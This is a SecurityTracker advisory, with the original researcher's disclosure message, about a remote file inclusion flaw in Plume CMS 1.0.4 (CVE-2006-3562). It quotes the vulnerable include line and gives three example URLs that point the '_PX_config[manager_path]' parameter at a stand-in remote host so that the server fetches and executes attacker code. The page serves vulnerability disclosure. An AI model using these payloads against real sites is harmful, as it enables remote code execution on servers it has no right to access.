SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Plume CMS Vendors:   plume-cms.net
Plume CMS Include File Flaws in '_PX_config[manager_path]' in Multiple Scripts Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016426
SecurityTracker URL:  http://securitytracker.com/id/1016426
CVE Reference:   CVE-2006-3562   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jul 3 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.4
Description:   A vulnerability was reported in Plume CMS. A remote user can execute arbitrary code on the target system.

The 'index.php', 'rss.php', and 'search.php' scripts do not properly validate user-supplied input in the '_PX_config[manager_path]' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

CrAsh_oVeR_rIdE of Arabian Security Team reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.plume-cms.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  plume-cms v1.0.4 Multiple Remote File include

plume cms  v1.0.4 Multiple Remote File include

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

Arabian Security Team

-------------------------------------------------

site of script:http://www.plume-cms.net/

-------------------------------------------------

Vulnerable: plume cms  v1.0.4

-------------------------------------------------

vulnerable code:

----------------------

include $_PX_config['manager_path'].'/frontinc/class.template.php';

_PX_config[manager_path] parameter File include

-----------------------------------------------------------------------------------------------------------------------------------------

vulnerable files  :

--------------------

index.php

rss.php

search.php

-------------------------------------------------

example:

www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcode.txt?

www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode.txt?

www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilcode.txt?

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR23@hotmail.com

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC